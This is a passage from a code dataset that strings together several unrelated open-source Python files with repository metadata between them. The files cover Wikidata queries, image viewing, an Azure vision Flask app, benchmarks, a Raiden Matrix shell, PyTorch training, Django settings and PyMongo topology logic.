. ?x wdt:P31 ?item . SERVICE wikibase:label { bd:serviceParam wikibase:language "en" . } } GROUP BY ?item ?itemLabel ORDER BY DESC(COUNT(?x)) LIMIT 10 """ event_distribution_query = """ SELECT ?eventType (COUNT(?event) AS ?cnt) WHERE { ?event wdt:P31 ?eventType . ?eventType wdt:P279* %s . ?sitelink schema:about ?event . ?sitelink schema:inLanguage "%s" . SERVICE wikibase:label { bd:serviceParam wikibase:language "en" . } } GROUP BY ?eventType ORDER BY DESC(COUNT(?event)) """ # def get_sum_lls(language_links): # sum_lls_per_lang = Counter() # for l in language_links: # for l1 in language_links[l]: # sum_lls_per_lang[l1] += language_links[l][l1] # return sum_lls_per_lang # def normalize_by_lls(language_links, sum_lls_per_lang): # for l in language_links: # for l1 in language_links[l]: # if l1 not in sum_lls_per_lang: del language_links[l][l1] # normalized = language_links[l][l1]/sum_lls_per_lang[l1] # language_links[l][l1] = normalized # return language_links # def normalize_by_LVsize(pairs): # to_delete = [] # for l1 in pairs: # if l1 in LV_sizes: # pairs[l1] = pairs[l1]/LV_sizes[l1] # else: # to_delete.append(l1) # for l in to_delete: # print(l) # del pairs[l] # return pairs def normalize(counter): total = sum(counter.values()) for key, value in counter.items(): counter[key] = (value/total) * 100 return counter def get_language_pairs(): ''' Get language links per query language for languages that have the same pages as query language.''' for lang in languages: language_links = {} lang = lang.strip() pairs = Counter() print(10*" * ", lang) result = utils.query_wikidata(language_pairs_query % (lang, lang)) if result.empty == True: continue l1s = result["l1.value"] values = result["cnt.value"] for l1, v in zip(l1s, values): pairs[l1] = int(v) language_links[lang] = normalize(pairs) utils.save2json(language_links, "resources/language_links_%s.json" % lang) def get_event_distributions(): for lang in languages: event_dist_per_language = {} event_distribution = Counter() lang = lang.strip() print(10*" * ", lang) # Just using one of the wds for "event": result = utils.query_wikidata(event_distribution_query % ("wd:Q1656682", lang)) if result.empty == True: continue event_types = result["eventType.value"] values = result["cnt.value"] for et, v in zip(event_types, values): event_distribution[et.split("/")[-1]] = int(v) if event_distribution: normalized_distribution = normalize(event_distribution) event_dist_per_language[lang] = normalized_distribution utils.save2json(event_dist_per_language, "resources/event_distributions_%s.json" % lang) event_dist_per_language = {} if __name__ == "__main__": get_language_pairs() #get_event_distributions()
26.041176
162
0.702281
682394209be4ca9fc032aefc7829d6dc5ee3f6b0
2,551
py
Python
viewer.py
BoyuanChen/visual_behavior_modeling
8b6eb0516c562306c5d775632223ad0de775f170
[ "MIT" ]
9
2019-12-04T12:50:43.000Z
2021-02-28T13:45:30.000Z
viewer.py
BoyuanChen/visual_behavior_modeling
8b6eb0516c562306c5d775632223ad0de775f170
[ "MIT" ]
null
null
null
viewer.py
BoyuanChen/visual_behavior_modeling
8b6eb0516c562306c5d775632223ad0de775f170
[ "MIT" ]
2
2020-07-09T20:35:15.000Z
2020-11-16T14:03:10.000Z
""" This code is for plotting real size output image. For high resolution images for demonstration and paper, please refer to demonstration_viewer.py """ import os import sys import shutil import numpy as np from PIL import Image from tqdm import tqdm test_results_folder = './test_results' test_results_img_folder = './test_results/images' test_results_files = os.listdir(test_results_folder) if os.path.exists(test_results_img_folder): shutil.rmtree(test_results_img_folder) os.makedirs(test_results_img_folder) height = 64 width = 192 test_results_files = ['test_resutls_90.npy'] for p_file in tqdm(test_results_files): p_file_path = os.path.join(test_results_folder, p_file) p_epoch_res = np.load(p_file_path) epoch_idx = p_file.split('.')[0].split('_')[2] epoch_folder = 'epoch_' + epoch_idx epoch_folder = os.path.join(test_results_img_folder, epoch_folder) os.makedirs(epoch_folder) index = 0 num_batch = p_epoch_res.shape[0] for p_batch in tqdm(range(num_batch)): data = p_epoch_res[p_batch][0] tar = p_epoch_res[p_batch][1] res = p_epoch_res[p_batch][2] batch_size = tar.shape[0] for p_data in range(batch_size): # get output image out_img = res[p_data] out_img = np.transpose(out_img, (1, 2, 0)) # out_img = out_img * 128 + 128 out_img = out_img * 255 # import IPython # IPython.embed() # assert False out_img = Image.fromarray(out_img.astype('uint8')) # get target image tar_out_img = tar[p_data] tar_out_img = np.transpose(tar_out_img, (1, 2, 0)) # tar_out_img = tar_out_img * 128 + 128 tar_out_img = tar_out_img * 255 tar_out_img = Image.fromarray(tar_out_img.astype('uint8')) # get data image data_out_img = data[p_data] data_out_img = np.transpose(data_out_img, (1, 2, 0)) # data_out_img = data_out_img * 128 + 128 data_out_img = data_out_img * 255 data_out_img = Image.fromarray(data_out_img.astype('uint8')) # save them side by side new = Image.new('RGB', (width, height)) new.paste(data_out_img, (0, 0)) new.paste(tar_out_img, (64, 0)) new.paste(out_img, (128, 0)) filename = 'img_' + str(index) + '.png' filepath = os.path.join(epoch_folder, filename) new.save(filepath) index += 1
34.013333
121
0.626421
83974620d21bef9f5bce02694199d5803d802da1
2,146
py
Python
app.py
AzureAdvocateBit/Hackathon-CaptureImageForComputerVision-1
7583dbc8fcb1afd2d4c7c498ca88e5fd63e08f7d
[ "MIT" ]
1
2022-03-03T20:51:27.000Z
2022-03-03T20:51:27.000Z
app.py
AzureAdvocateBit/Hackathon-CaptureImageForComputerVision-1
7583dbc8fcb1afd2d4c7c498ca88e5fd63e08f7d
[ "MIT" ]
null
null
null
app.py
AzureAdvocateBit/Hackathon-CaptureImageForComputerVision-1
7583dbc8fcb1afd2d4c7c498ca88e5fd63e08f7d
[ "MIT" ]
3
2020-05-25T05:57:07.000Z
2020-11-14T10:02:15.000Z
import os, io, base64 from flask import Flask, render_template, request, jsonify from azure.cognitiveservices.vision.computervision import ComputerVisionClient from azure.cognitiveservices.vision.computervision.models import TextOperationStatusCodes from azure.cognitiveservices.vision.computervision.models import TextRecognitionMode from azure.cognitiveservices.vision.computervision.models import VisualFeatureTypes from msrest.authentication import CognitiveServicesCredentials credentials = CognitiveServicesCredentials(os.environ['computer_vision_key']) computervision_client = ComputerVisionClient(os.environ['computer_vision_endpoint'], credentials) app = Flask(__name__) # The root route, returns the home.html page @app.route('/') def home(): # Add any required page data here page_data = {} return render_template('home.html', page_data = page_data) @app.route('/process_image', methods=['POST']) def check_results(): # Get the JSON passed to the request and extract the image # Convert the image to a binary stream ready to pass to Azure AI services body = request.get_json() image_bytes = base64.b64decode(body['image_base64'].split(',')[1]) image = io.BytesIO(image_bytes) # Send the image to the Computer Vision service description_results = computervision_client.describe_image_in_stream(image) # Get the captions (descriptions) from the response, with confidence level description = 'Description of remote image: ' if (len(description_results.captions) == 0): description = description + 'No description detected.' else: for caption in description_results.captions: description = description + '\n"{}" with confidence {:.2f}%'.format(caption.text, caption.confidence * 100) ###################################################### # # # Add your code here to use the Computer Vision SDK # # # ##################################################### # Return a result return jsonify({'description' : description})
44.708333
119
0.679404
1395376f9b395e4b39c034a6d9d886d02e7ff356
1,364
py
Python
python/benchmark/function/test_activation.py
daniel-falk/nnabla
3fe132ea52dc10521cc029a5d6ba8f565cf65ccf
[ "Apache-2.0" ]
2,792
2017-06-26T13:05:44.000Z
2022-03-28T07:55:26.000Z
python/benchmark/function/test_activation.py
daniel-falk/nnabla
3fe132ea52dc10521cc029a5d6ba8f565cf65ccf
[ "Apache-2.0" ]
138
2017-06-27T07:04:44.000Z
2022-02-28T01:37:15.000Z
python/benchmark/function/test_activation.py
daniel-falk/nnabla
3fe132ea52dc10521cc029a5d6ba8f565cf65ccf
[ "Apache-2.0" ]
380
2017-06-26T13:23:52.000Z
2022-03-25T16:51:30.000Z
# Copyright 2017,2018,2019,2020,2021 Sony Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import pytest import nnabla.functions as F from function_benchmark import FunctionBenchmark, Inspec def inspecs_params(): inspecs = [] inspecs.append([Inspec((64, 64, 224, 224))]) inspecs.append([Inspec((64, 128, 112, 112))]) inspecs.append([Inspec((64, 512, 14, 14))]) return inspecs @pytest.mark.parametrize('inspecs', inspecs_params()) @pytest.mark.parametrize('activation', ['identity', 'sigmoid', 'tanh', 'relu', 'elu', 'crelu']) def test_activation(inspecs, activation, nnabla_opts): func = getattr(F, activation) fb = FunctionBenchmark( func, inspecs, [], {}, nnabla_opts.ext, nnabla_opts.ext_kwargs) fb.benchmark() fb.write(writer=nnabla_opts.function_benchmark_writer)
33.268293
81
0.709677
47aacbe7332e3b8f2de658635efa7783a771f68e
1,495
py
Python
tools/debugging/matrix/api_shell.py
tirkarthi/raiden
dbd03ddda039332b54ec0c02d81cbe1100bc8028
[ "MIT" ]
2,101
2016-06-01T11:31:49.000Z
2022-03-27T20:13:19.000Z
tools/debugging/matrix/api_shell.py
tirkarthi/raiden
dbd03ddda039332b54ec0c02d81cbe1100bc8028
[ "MIT" ]
5,291
2016-06-01T18:14:04.000Z
2022-03-31T11:19:09.000Z
tools/debugging/matrix/api_shell.py
tirkarthi/raiden
dbd03ddda039332b54ec0c02d81cbe1100bc8028
[ "MIT" ]
484
2016-06-01T18:21:06.000Z
2022-03-22T10:29:45.000Z
#!/usr/bin/env python import os import click import IPython from eth_utils import encode_hex, to_normalized_address from raiden.accounts import AccountManager from raiden.network.transport.matrix.client import GMatrixHttpApi from raiden.utils.cli import ADDRESS_TYPE from raiden.utils.formatting import to_checksum_address from raiden.utils.signer import LocalSigner from raiden.utils.typing import Address @click.command() @click.option( "--address", help="The ethereum address for which to get a login", type=ADDRESS_TYPE, required=True, ) @click.password_option( "--password", confirmation_prompt=False, help="Password to unlock the keystore file." ) @click.option( "--server", help="Matrix server to connect to", default="https://transport01.raiden.network" ) def matrix_api_shell(address: Address, password: str, server: str) -> None: am = AccountManager(os.path.expanduser("~/.ethereum/keystore")) signer = LocalSigner(am.get_privkey(to_checksum_address(address), password)) server_name = server.split("//")[1] matrix_password = encode_hex(signer.sign(server_name.encode())) api = GMatrixHttpApi(server) resp = api.login( "m.login.password", user=to_normalized_address(address), password=matrix_password ) api.token = resp["access_token"] IPython.embed(header=f"Use the `api` object to interact with matrix on {server}.") if __name__ == "__main__": matrix_api_shell() # pylint: disable=no-value-for-parameter
33.222222
96
0.747157
a9ff5eee96d3ddf89b5b67ffcdbf9370093ab44a
7,851
py
Python
models/baseline/baseline_train.py
Sharp-rookie/seedcup
27a001c43459ec9bb69ab7596e0efbab93ed7708
[ "Apache-2.0" ]
1
2021-11-18T23:52:14.000Z
2021-11-18T23:52:14.000Z
models/baseline/baseline_train.py
Sharp-rookie/seedcup
27a001c43459ec9bb69ab7596e0efbab93ed7708
[ "Apache-2.0" ]
null
null
null
models/baseline/baseline_train.py
Sharp-rookie/seedcup
27a001c43459ec9bb69ab7596e0efbab93ed7708
[ "Apache-2.0" ]
null
null
null
import torch import torch.nn as nn import torch.optim as optim from torch.utils.data import Dataset, DataLoader from colorama import Fore from baseline_model import Fake1DAttention from metric import * import pandas as pd import os import argparse from hyp_evol import * rate = "0.5" # 默认为6:4的正负样本比例,若要改为1:1则取rate=“0.5” record = pd.DataFrame(columns=['Epoch', 'P1', 'P0', 'Fscore']) class SeedDataset(Dataset): def __init__(self, annotations_file): super().__init__() self.data: pd.DataFrame = pd.read_csv(annotations_file) self.data: pd.DataFrame = self.data[self.data['label'].notna()] self.Y = self.data['label'] self.X = self.data.drop(columns=['id', 'label']).fillna(value=-1) def __len__(self): return len(self.data) def __getitem__(self, idx): return torch.as_tensor(self.X.iloc[idx].values).type(torch.FloatTensor), torch.as_tensor(self.Y.iloc[idx]).type( torch.LongTensor) def train(dataloader, model, loss_fn, optimizer, device, positive_weight): model.train() Y = [] for batch, (X, y) in enumerate(dataloader): X, y = X.to(device), y.to(device) logit = model(X) positive_index = y == 1 loss = loss_fn(logit, y) loss = (positive_weight * loss_fn(logit[positive_index], y[positive_index]) + loss_fn(logit[~positive_index], y[ ~positive_index])) / len(X) optimizer.zero_grad() loss.backward() optimizer.step() # if batch % 100 == 0: # loss = loss.item() # print( # f"{Fore.GREEN + '[train]===>'} loss: {loss} {'' + Fore.RESET}") def valid(dataloader, model, loss_fn, device): model.eval() num_dataset = len(dataloader.dataset) loss = 0 with torch.no_grad(): pred, Y = [], [] for batch, (X, y) in enumerate(dataloader): X, y = X.to(device), y.to(device) logit = model(X) loss += loss_fn(logit, y).item() pred.append(logit.argmax(1)) Y.append(y) loss /= num_dataset pred = torch.cat(pred) Y = torch.cat(Y) # metric = {'acc': 0, 'precision': 0, 'recall': 0, 'Fscore': 0} # metric['acc'] = Accuracy(pred, Y) # metric['precision'] = Precision(pred, Y) # metric['recall'] = Recall(pred, Y) # metric['Fscore'] = Fscore(pred, Y) # print(f"{Fore.CYAN + '[valid]===>'} " # f"loss: {loss} acc: {metric['acc']} precision: {metric['precision']} recall: {metric['recall']} fscore: {metric['Fscore']}" # f"{'' + Fore.RESET}") return P1(pred, Y), P0(pred, Y), Fscore(pred, Y) def parse_args(): parser = argparse.ArgumentParser() parser.add_argument('--evol', action='store_true', help="hyperparameters auto evolve") parser.add_argument('--train', type=str, default="../../data/unmodified/train.csv") parser.add_argument('--valid', type=str, default=f"../../data/unmodified/{rate}valid_balanced.csv") parser.add_argument('--device', type=str, default='cpu') parser.add_argument('--in_feature', type=int, default=28) # parser.add_argument('--model', help="train with last model", # type=str, default="./checkpoints/unevol/24_epoc.pt") return parser.parse_args() if __name__ == '__main__': args = parse_args() torch.manual_seed(777) device = torch.device(args.device) batch_size, in_features, out_features = 30, args.in_feature, 2 lr, positive_weight = 1e-3, 2.33 epochs = 300 loss_fn = (nn.CrossEntropyLoss()).to(device) train_dataset = SeedDataset(args.train) train_dataloader = DataLoader( train_dataset, batch_size=batch_size, shuffle=True) valid_dataset = SeedDataset(args.valid) valid_dataloader = DataLoader(valid_dataset, batch_size=1, shuffle=False) if(os.path.isdir(f"../../checkpoints") == 0): os.mkdir(f"../../checkpoints") if(os.path.isdir(f"../../checkpoints/baseline") == 0): os.mkdir(f"../../checkpoints/baseline") # Direct train if args.evol == False: print( f"\nepochs: {epochs}\ndevice: {device}\nin_feature: {args.in_feature}\ntrain_set: {args.train}\nvalid_set: {args.valid}\n") if(os.path.isdir("../../checkpoints/baseline/unevol") == 0): os.mkdir("../../checkpoints/baseline/unevol") model = Fake1DAttention(in_features, out_features).to(device) optimizer = optim.Adagrad(model.parameters(), lr=lr) for t in range(epochs): # print(f"{Fore.GREEN + '===>'} Epoch {t + 1} {'' + Fore.RESET}\n" # "---------------------------------------") train(train_dataloader, model, loss_fn, optimizer, device, positive_weight) P1_, P0_, Fscore_ = valid(valid_dataloader, model, loss_fn, device) record.loc[t] = (str(t), str(P1_), str(P0_), str(Fscore_)) torch.save(model.state_dict(), f"../../checkpoints/baseline/unevol/{t}_epoc.pt") record.to_csv("record.csv") # Train after hyperparameter evolution else: if(os.path.isdir("../../checkpoints/baseline/evol") == 0): os.mkdir("../../checkpoints/baseline/evol") hyp = {'lr': 1e-3, 'positive_weight': 2.33} # Hyperparameter evolution metadata (mutation scale 0-1, lower_limit, upper_limit) meta = {'lr': (1, 1e-5, 1), # learning rate 'positive_weight': (1, 0.5, 5)} # Hyperparameter evolution for g in range(10): model = Fake1DAttention(in_features, out_features).to(device) if(os.path.isdir(f"../../checkpoints/baseline/evol/generate_{g}") == 0): os.mkdir(f"../../checkpoints/baseline/evol/generate_{g}") # Get hyperparameter from gene bank lr, positive_weight = GetHyper(meta, hyp) optimizer = optim.Adagrad(model.parameters(), lr=lr) # Train for t in range(30): print( "---------------------------------------\n"f"{Fore.GREEN + '===>'} Generate[{g}] --- Epoch{t + 1} {'' + Fore.RESET}:") train(train_dataloader, model, loss_fn, optimizer, device, positive_weight) metric = valid(valid_dataloader, model, loss_fn, device) torch.save(model.state_dict(), f"../../checkpoints/baseline/evol/generate_{g}/{g}_{t}_epoc.pt") # Update the gene bank with fitness values Update_gene(hyp, metric) # Train with best hyperparameters x = np.loadtxt('evolve.txt', ndmin=2) lr = x[0][4] positive_weight = x[0][5] print( f"best hyperparameter : lr={lr} positive_weight={positive_weight}\n") model = Fake1DAttention(in_features, out_features).to(device) optimizer = optim.Adagrad(model.parameters(), lr=lr) for t in range(epochs): print(f"{Fore.GREEN + '===>'} Epoch {t + 1} {'' + Fore.RESET}\n" "---------------------------------------") train(train_dataloader, model, loss_fn, optimizer, device, positive_weight) valid(valid_dataloader, model, loss_fn, device) if(os.path.isdir(f"../../checkpoints/baseline/evol/best/best_epoc_{t}.pt") == 0): os.mkdir( f"../../checkpoints/baseline/evol/best/best_epoc_{t}.pt") torch.save(model.state_dict(), f"../../checkpoints/baseline/evol/best/best_epoc_{t}.pt")
35.524887
144
0.562221
8eab8d0032392a0fdc73fd6f2e75ce07c249e85d
3,751
py
Python
test/project/settings.py
tylerlacy/bootstrap-uploadprogress
f563b1e6b55a6d6a4601ed4996a2429bb353a1a3
[ "MIT" ]
null
null
null
test/project/settings.py
tylerlacy/bootstrap-uploadprogress
f563b1e6b55a6d6a4601ed4996a2429bb353a1a3
[ "MIT" ]
null
null
null
test/project/settings.py
tylerlacy/bootstrap-uploadprogress
f563b1e6b55a6d6a4601ed4996a2429bb353a1a3
[ "MIT" ]
null
null
null
""" Django settings for progress project. Generated by 'django-admin startproject' using Django 1.10.1. For more information on this file, see https://docs.djangoproject.com/en/1.10/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.10/ref/settings/ """ import os # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = '!#s%vt0m5z801g5#i^^ov(y#y*j&&h04(zg^o(817i-o4t=bk6' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'crispy_forms', 'djangobower', 'project.progress' ] MIDDLEWARE_CLASSES = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'project.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'project.wsgi.application' # Database # https://docs.djangoproject.com/en/1.10/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Password validation # https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/1.10/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.10/howto/static-files/ STATIC_URL = '/static/' CRISPY_TEMPLATE_PACK = 'bootstrap3' BOWER_INSTALLED_APPS = ( 'bootstrap#3.3', 'html5shiv', 'respond', 'bootstrap-filestyle', # 'bootstrap-uploadprogress' # Use this in production. ) # For bootstrap-uploadprogress.js STATICFILES_DIRS = ( "../..", ) BOWER_COMPONENTS_ROOT = os.path.join(BASE_DIR, 'components') MEDIA_ROOT = os.path.join(BASE_DIR, 'upload') STATICFILES_FINDERS = ( 'django.contrib.staticfiles.finders.FileSystemFinder', 'django.contrib.staticfiles.finders.AppDirectoriesFinder', 'djangobower.finders.BowerFinder', )
25.006667
91
0.696614
eca7615206e300f7c6681200e12935bba8ba3826
20,631
py
Python
pymongo/topology_description.py
tony/mongo-python-driver
d43ca118f91dda373356802ee8ec976d96c366b9
[ "Apache-2.0" ]
46
2019-03-01T02:19:18.000Z
2021-12-18T12:37:02.000Z
pymongo/topology_description.py
tony/mongo-python-driver
d43ca118f91dda373356802ee8ec976d96c366b9
[ "Apache-2.0" ]
9
2019-12-05T00:49:12.000Z
2021-09-08T01:31:25.000Z
pymongo/topology_description.py
tony/mongo-python-driver
d43ca118f91dda373356802ee8ec976d96c366b9
[ "Apache-2.0" ]
67
2018-10-29T09:50:49.000Z
2022-01-06T07:35:56.000Z
# Copyright 2014-present MongoDB, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you # may not use this file except in compliance with the License. You # may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. See the License for the specific language governing # permissions and limitations under the License. """Represent a deployment of MongoDB servers.""" from collections import namedtuple from pymongo import common from pymongo.errors import ConfigurationError from pymongo.read_preferences import ReadPreference from pymongo.server_description import ServerDescription from pymongo.server_selectors import Selection from pymongo.server_type import SERVER_TYPE TOPOLOGY_TYPE = namedtuple('TopologyType', ['Single', 'ReplicaSetNoPrimary', 'ReplicaSetWithPrimary', 'Sharded', 'Unknown'])(*range(5)) class TopologyDescription(object): def __init__(self, topology_type, server_descriptions, replica_set_name, max_set_version, max_election_id, topology_settings): """Representation of a deployment of MongoDB servers. :Parameters: - `topology_type`: initial type - `server_descriptions`: dict of (address, ServerDescription) for all seeds - `replica_set_name`: replica set name or None - `max_set_version`: greatest setVersion seen from a primary, or None - `max_election_id`: greatest electionId seen from a primary, or None - `topology_settings`: a TopologySettings """ self._topology_type = topology_type self._replica_set_name = replica_set_name self._server_descriptions = server_descriptions self._max_set_version = max_set_version self._max_election_id = max_election_id # The heartbeat_frequency is used in staleness estimates. self._topology_settings = topology_settings # Is PyMongo compatible with all servers' wire protocols? self._incompatible_err = None for s in self._server_descriptions.values(): if not s.is_server_type_known: continue # s.min/max_wire_version is the server's wire protocol. # MIN/MAX_SUPPORTED_WIRE_VERSION is what PyMongo supports. server_too_new = ( # Server too new. s.min_wire_version is not None and s.min_wire_version > common.MAX_SUPPORTED_WIRE_VERSION) server_too_old = ( # Server too old. s.max_wire_version is not None and s.max_wire_version < common.MIN_SUPPORTED_WIRE_VERSION) if server_too_new: self._incompatible_err = ( "Server at %s:%d requires wire version %d, but this " "version of PyMongo only supports up to %d." % (s.address[0], s.address[1], s.min_wire_version, common.MAX_SUPPORTED_WIRE_VERSION)) elif server_too_old: self._incompatible_err = ( "Server at %s:%d reports wire version %d, but this " "version of PyMongo requires at least %d (MongoDB %s)." % (s.address[0], s.address[1], s.max_wire_version, common.MIN_SUPPORTED_WIRE_VERSION, common.MIN_SUPPORTED_SERVER_VERSION)) break # Server Discovery And Monitoring Spec: Whenever a client updates the # TopologyDescription from an ismaster response, it MUST set # TopologyDescription.logicalSessionTimeoutMinutes to the smallest # logicalSessionTimeoutMinutes value among ServerDescriptions of all # data-bearing server types. If any have a null # logicalSessionTimeoutMinutes, then # TopologyDescription.logicalSessionTimeoutMinutes MUST be set to null. readable_servers = self.readable_servers if not readable_servers: self._ls_timeout_minutes = None elif any(s.logical_session_timeout_minutes is None for s in readable_servers): self._ls_timeout_minutes = None else: self._ls_timeout_minutes = min(s.logical_session_timeout_minutes for s in readable_servers) def check_compatible(self): """Raise ConfigurationError if any server is incompatible. A server is incompatible if its wire protocol version range does not overlap with PyMongo's. """ if self._incompatible_err: raise ConfigurationError(self._incompatible_err) def has_server(self, address): return address in self._server_descriptions def reset_server(self, address): """A copy of this description, with one server marked Unknown.""" return updated_topology_description(self, ServerDescription(address)) def reset(self): """A copy of this description, with all servers marked Unknown.""" if self._topology_type == TOPOLOGY_TYPE.ReplicaSetWithPrimary: topology_type = TOPOLOGY_TYPE.ReplicaSetNoPrimary else: topology_type = self._topology_type # The default ServerDescription's type is Unknown. sds = dict((address, ServerDescription(address)) for address in self._server_descriptions) return TopologyDescription( topology_type, sds, self._replica_set_name, self._max_set_version, self._max_election_id, self._topology_settings) def server_descriptions(self): """Dict of (address, :class:`~pymongo.server_description.ServerDescription`).""" return self._server_descriptions.copy() @property def topology_type(self): """The type of this topology.""" return self._topology_type @property def topology_type_name(self): """The topology type as a human readable string. .. versionadded:: 3.4 """ return TOPOLOGY_TYPE._fields[self._topology_type] @property def replica_set_name(self): """The replica set name.""" return self._replica_set_name @property def max_set_version(self): """Greatest setVersion seen from a primary, or None.""" return self._max_set_version @property def max_election_id(self): """Greatest electionId seen from a primary, or None.""" return self._max_election_id @property def logical_session_timeout_minutes(self): """Minimum logical session timeout, or None.""" return self._ls_timeout_minutes @property def known_servers(self): """List of Servers of types besides Unknown.""" return [s for s in self._server_descriptions.values() if s.is_server_type_known] @property def has_known_servers(self): """Whether there are any Servers of types besides Unknown.""" return any(s for s in self._server_descriptions.values() if s.is_server_type_known) @property def readable_servers(self): """List of readable Servers.""" return [s for s in self._server_descriptions.values() if s.is_readable] @property def common_wire_version(self): """Minimum of all servers' max wire versions, or None.""" servers = self.known_servers if servers: return min(s.max_wire_version for s in self.known_servers) return None @property def heartbeat_frequency(self): return self._topology_settings.heartbeat_frequency def apply_selector(self, selector, address, custom_selector=None): def apply_local_threshold(selection): if not selection: return [] settings = self._topology_settings # Round trip time in seconds. fastest = min( s.round_trip_time for s in selection.server_descriptions) threshold = settings.local_threshold_ms / 1000.0 return [s for s in selection.server_descriptions if (s.round_trip_time - fastest) <= threshold] if getattr(selector, 'min_wire_version', 0): common_wv = self.common_wire_version if common_wv and common_wv < selector.min_wire_version: raise ConfigurationError( "%s requires min wire version %d, but topology's min" " wire version is %d" % (selector, selector.min_wire_version, common_wv)) if self.topology_type == TOPOLOGY_TYPE.Single: # Ignore selectors for standalone. return self.known_servers elif address: # Ignore selectors when explicit address is requested. description = self.server_descriptions().get(address) return [description] if description else [] elif self.topology_type == TOPOLOGY_TYPE.Sharded: # Ignore read preference. selection = Selection.from_topology_description(self) else: selection = selector(Selection.from_topology_description(self)) # Apply custom selector followed by localThresholdMS. if custom_selector is not None and selection: selection = selection.with_server_descriptions( custom_selector(selection.server_descriptions)) return apply_local_threshold(selection) def has_readable_server(self, read_preference=ReadPreference.PRIMARY): """Does this topology have any readable servers available matching the given read preference? :Parameters: - `read_preference`: an instance of a read preference from :mod:`~pymongo.read_preferences`. Defaults to :attr:`~pymongo.read_preferences.ReadPreference.PRIMARY`. .. note:: When connected directly to a single server this method always returns ``True``. .. versionadded:: 3.4 """ common.validate_read_preference("read_preference", read_preference) return any(self.apply_selector(read_preference, None)) def has_writable_server(self): """Does this topology have a writable server available? .. note:: When connected directly to a single server this method always returns ``True``. .. versionadded:: 3.4 """ return self.has_readable_server(ReadPreference.PRIMARY) # If topology type is Unknown and we receive an ismaster response, what should # the new topology type be? _SERVER_TYPE_TO_TOPOLOGY_TYPE = { SERVER_TYPE.Mongos: TOPOLOGY_TYPE.Sharded, SERVER_TYPE.RSPrimary: TOPOLOGY_TYPE.ReplicaSetWithPrimary, SERVER_TYPE.RSSecondary: TOPOLOGY_TYPE.ReplicaSetNoPrimary, SERVER_TYPE.RSArbiter: TOPOLOGY_TYPE.ReplicaSetNoPrimary, SERVER_TYPE.RSOther: TOPOLOGY_TYPE.ReplicaSetNoPrimary, } def updated_topology_description(topology_description, server_description): """Return an updated copy of a TopologyDescription. :Parameters: - `topology_description`: the current TopologyDescription - `server_description`: a new ServerDescription that resulted from an ismaster call Called after attempting (successfully or not) to call ismaster on the server at server_description.address. Does not modify topology_description. """ address = server_description.address # These values will be updated, if necessary, to form the new # TopologyDescription. topology_type = topology_description.topology_type set_name = topology_description.replica_set_name max_set_version = topology_description.max_set_version max_election_id = topology_description.max_election_id server_type = server_description.server_type # Don't mutate the original dict of server descriptions; copy it. sds = topology_description.server_descriptions() # Replace this server's description with the new one. sds[address] = server_description if topology_type == TOPOLOGY_TYPE.Single: # Single type never changes. return TopologyDescription( TOPOLOGY_TYPE.Single, sds, set_name, max_set_version, max_election_id, topology_description._topology_settings) if topology_type == TOPOLOGY_TYPE.Unknown: if server_type == SERVER_TYPE.Standalone: sds.pop(address) elif server_type not in (SERVER_TYPE.Unknown, SERVER_TYPE.RSGhost): topology_type = _SERVER_TYPE_TO_TOPOLOGY_TYPE[server_type] if topology_type == TOPOLOGY_TYPE.Sharded: if server_type not in (SERVER_TYPE.Mongos, SERVER_TYPE.Unknown): sds.pop(address) elif topology_type == TOPOLOGY_TYPE.ReplicaSetNoPrimary: if server_type in (SERVER_TYPE.Standalone, SERVER_TYPE.Mongos): sds.pop(address) elif server_type == SERVER_TYPE.RSPrimary: (topology_type, set_name, max_set_version, max_election_id) = _update_rs_from_primary(sds, set_name, server_description, max_set_version, max_election_id) elif server_type in ( SERVER_TYPE.RSSecondary, SERVER_TYPE.RSArbiter, SERVER_TYPE.RSOther): topology_type, set_name = _update_rs_no_primary_from_member( sds, set_name, server_description) elif topology_type == TOPOLOGY_TYPE.ReplicaSetWithPrimary: if 